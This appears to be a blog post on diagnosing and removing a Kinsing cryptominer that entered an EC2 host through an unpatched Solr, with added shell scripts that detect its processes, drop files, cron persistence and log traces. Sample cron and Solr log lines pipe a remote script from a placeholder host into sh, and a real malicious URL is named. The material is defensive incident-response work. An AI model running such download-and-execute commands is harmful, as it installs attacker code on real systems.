I came to know that my EC2 instance was infected when I found CPU usage going to 99%. There were two malicious processes (kinsing, kdevtmpfsi) running when I ran the commands:
top (see 100% CPU.jpeg)
ps aux
I have gone through a bunch of links and tried out a lot of different things from different websites. Most of them share temporary solutions.
I found a temporary solution in: redis/docker-library-redis#217
Kinsing creates 3 files in the /var/tmp and /tmp directories. So if we change the content of the files and change their permissions, it will work for some period of time.
There is a cronjob which looks like "http://195.3.146.118/s.sh"; if so, remove it.
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
echo "everything is good here" > /tmp/zzz
sudo chown -R root:root /tmp/kdevtmpfsi
sudo chown -R root:root /tmp/zzz
sudo chown -R root:root /var/tmp/kinsing
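While the steps above only buy time, the same indicators (the two process names, the drop files in /tmp and /var/tmp, and a cron entry that fetches a remote script) are what you keep watching for to know whether the miner has come back. The script below is an added example, not part of the original post: each check takes its input as text, so it can run against live command output or against copies saved from an affected host. The process and cron samples inside it are constructed, and the cron file locations assume a Debian/Ubuntu layout.

```shell
#!/bin/sh
# Added example, not part of the original post: host triage checks for the
# indicators described above (miner process names, drop files in /tmp and
# /var/tmp, a cron entry that fetches a remote script). Each check reads its
# input as text, so it can run on live command output or on saved copies.

# Print process-listing lines whose command is kinsing or kdevtmpfsi.
# Input on stdin: output of `ps -eo pid,user,pcpu,comm` (or `ps aux`).
# Returns 0 when at least one line matched, 1 otherwise (grep's exit status).
find_miner_processes() {
    grep -E '(^|[[:space:]/])(kinsing|kdevtmpfsi)([[:space:]]|$)'
}

# Print cron lines that pull something from a remote URL, which is how the
# miner keeps re-installing itself. Comment lines are skipped.
# Input on stdin: crontab text (crontab -l, /etc/crontab, /etc/cron.d/*).
find_remote_fetch_cron() {
    grep -Ev '^[[:space:]]*#' | grep -Ei '(curl|wget|https?://)'
}

# Report which of the drop paths named above exist. $1 is an optional root
# prefix so the check can be pointed at a mounted image or a test directory.
# Returns 0 when at least one path exists.
find_drop_files() {
    base="${1:-}"
    rc=1
    for f in /tmp/kdevtmpfsi /tmp/zzz /var/tmp/kinsing; do
        if [ -e "$base$f" ]; then
            printf 'drop file present: %s\n' "$base$f"
            rc=0
        fi
    done
    return $rc
}

# Constructed sample input (not real capture data) so the checks can be
# exercised without an infected host.
SAMPLE_PS='  PID USER     %CPU COMMAND
    1 root      0.0 systemd
 2084 solr      0.3 kinsing
 2110 solr     99.1 kdevtmpfsi
 2201 ubuntu    0.0 sshd'

SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://198.51.100.7/s.sh | sh'

# Live mode: `sh triage.sh --live` runs the checks against this host.
# Cron locations follow the Debian/Ubuntu layout (an assumption).
if [ "${1:-}" = "--live" ]; then
    echo '== miner processes =='
    ps -eo pid,user,pcpu,comm | find_miner_processes || echo none
    echo '== cron entries fetching remote URLs =='
    { crontab -l 2>/dev/null; cat /etc/crontab /etc/cron.d/* 2>/dev/null; } \
        | find_remote_fetch_cron || echo none
    echo '== drop files =='
    find_drop_files || echo none
fi
```

Run it as `sh triage.sh --live` on the host, or pipe saved `ps` and crontab output into the individual functions. A cron line that matched is the one to remove; the process list tells you whether the miner has respawned after the files were replaced, which is the signal that the entry point is still open.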
But the issue with the above solution is that if you monitor for some time, the virus comes back with some different folders and files. On one of my servers it didn't even allow me to SSH in.
It was a frustrating time figuring out where it entered from. If we know the entry gate, then we can surely close it and solve this permanently. Some people say that it enters through the open Docker API port. But Docker was not installed on my instance, so that wasn't the case.
Then, after a lot of research and article analysis, I found that it may be possible because of a patching issue in open source software. This one was a real kick for me, as it directed my thoughts in the right direction. It helped me figure out that kinsing stores a .sh file on the system through a glitch in open source software and executes its code on our server.
If you are using an older PHPMailer version, there are some vulnerabilities which might allow Remote Code Execution (RCE) on your system.
https://www.cvedetails.com/cve/CVE-2016-10045/
But in my case I have the latest PHPMailer, so again this was not the case.
Yes, there are a lot of vulnerabilities regarding Solr which allow them to enter the system and play with data.
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-18263/Apache-Solr.html
I have Solr 6.6.5 and there is an "Exec Code" vulnerability, which made me think of looking at the Solr log file (/solr/server/solr/logs). Here I found what I was looking for. Kinsing sends the entire .sh file in a search query on port 8983 and then executes it. So it updated my crontab files and created all the malicious processes.
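Finding that trace in the log can be done systematically rather than by reading it by hand. The script below is an added example, not part of the original post: it scans Solr request-log lines for query parameters that carry shell-download text and summarises which handler path they arrived through. It assumes the solr.log format of Solr 6.x and 8.x, in which each search request is logged by `o.a.s.c.S.Request` with a `params={...}` field; the sample log lines inside it are constructed.

```shell
#!/bin/sh
# Added example, not part of the original post: scan Solr request-log lines
# for query parameters that contain shell-download text, the trace described
# above. It assumes the Solr 6.x/8.x solr.log format, in which each search
# request is logged by o.a.s.c.S.Request with a "params={...}" field.

# Print request-log lines whose params field carries shell-fetch indicators:
# curl/wget, a URL (plain or URL-encoded "://"), a .sh filename, a shell
# binary, chmod, crontab or base64. Returns 0 when any line matched.
scan_solr_requests() {
    grep -E 'o\.a\.s\.c\.S\.Request' \
    | grep -Ei 'params=\{[^}]*(curl|wget|https?(://|%3a%2f%2f)|\.sh([^a-z0-9]|$)|/bin/(ba)?sh|chmod|crontab|base64)'
}

# Summarise the matched lines by request handler path (e.g. /select), which
# shows which endpoint the payload arrived through.
# Input on stdin: output of scan_solr_requests.
suspicious_paths() {
    sed -n 's/.*path=\([^ ]*\).*/\1/p' | sort | uniq -c
}

# Constructed sample log lines (not a real capture): one normal search, one
# search whose q= parameter contains shell-download text, and one admin call
# that is not a search request and is ignored by the scan.
SAMPLE_SOLR_LOG='2020-05-12 10:01:03.117 INFO  (qtp1213349904-18) [   x:products] o.a.s.c.S.Request [products]  webapp=/solr path=/select params={q=name:laptop&wt=json} hits=12 status=0 QTime=3
2020-05-12 10:01:09.402 INFO  (qtp1213349904-21) [   x:products] o.a.s.c.S.Request [products]  webapp=/solr path=/select params={q=*:*+curl+-s+http://198.51.100.7/s.sh+|+sh&wt=json} hits=0 status=400 QTime=1
2020-05-12 10:01:10.900 INFO  (qtp1213349904-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={action=STATUS} status=0 QTime=2'

# Live mode: `sh scan_solr.sh --live [logdir]` scans the Solr log directory
# (the path from the post is the default).
if [ "${1:-}" = "--live" ]; then
    logdir="${2:-/solr/server/solr/logs}"
    matches=$(cat "$logdir"/solr.log* 2>/dev/null | scan_solr_requests) || true
    if [ -n "$matches" ]; then
        printf '%s\n' "$matches"
        echo '== handler paths =='
        printf '%s\n' "$matches" | suspicious_paths
    else
        echo 'no suspicious search requests found'
    fi
fi
```

The match is deliberately broad and case-insensitive, so expect to review the hits rather than act on them blindly. Two caveats: a payload that is fully URL-encoded will slip past the literal indicators (decode the params field first if you see percent-encoded queries), and the request log does not record the client address; for that, correlate the timestamps with Jetty's request log in the same logs directory.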
Solution: First, I updated my Solr to the latest version, 8.5.1, which is more secure, with the existing vulnerability removed.
Second, it offers SOLR_IP_WHITELIST (https://lucene.apache.org/solr/guide/8_5/solr-upgrade-notes.html) security, so set this variable such that remote access is forbidden.
This helped me resolve the issue.
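For reference, this is how the setting looks in Solr's bin/solr.in.sh, shown as an added example rather than copied from the post or from Solr's own file. The shipped file carries the variable commented out, which is the weak default: any client that can reach port 8983 is served. The 10.0.1.0/24 range stands in for your own application subnet and is an assumption to adjust.

```shell
# solr.in.sh (Solr 8.5+): added example, not taken from the post. In the
# shipped file the setting is commented out, which is the weak default: every
# client that can reach port 8983 is served.
#SOLR_IP_WHITELIST="192.168.0.10, 192.168.0.0/24"

# Hardened: accept only the loopback interface and the application servers
# that legitimately query Solr. The 10.0.1.0/24 range is a placeholder for
# your own application subnet (an assumption, adjust it to your network).
SOLR_IP_WHITELIST="127.0.0.1, 10.0.1.0/24"
```

Restart Solr after the change and confirm from a host outside the list that requests to port 8983 are rejected. The whitelist is enforced by Solr itself, so on EC2 it belongs alongside, not instead of, a security group rule that keeps 8983 closed to the internet.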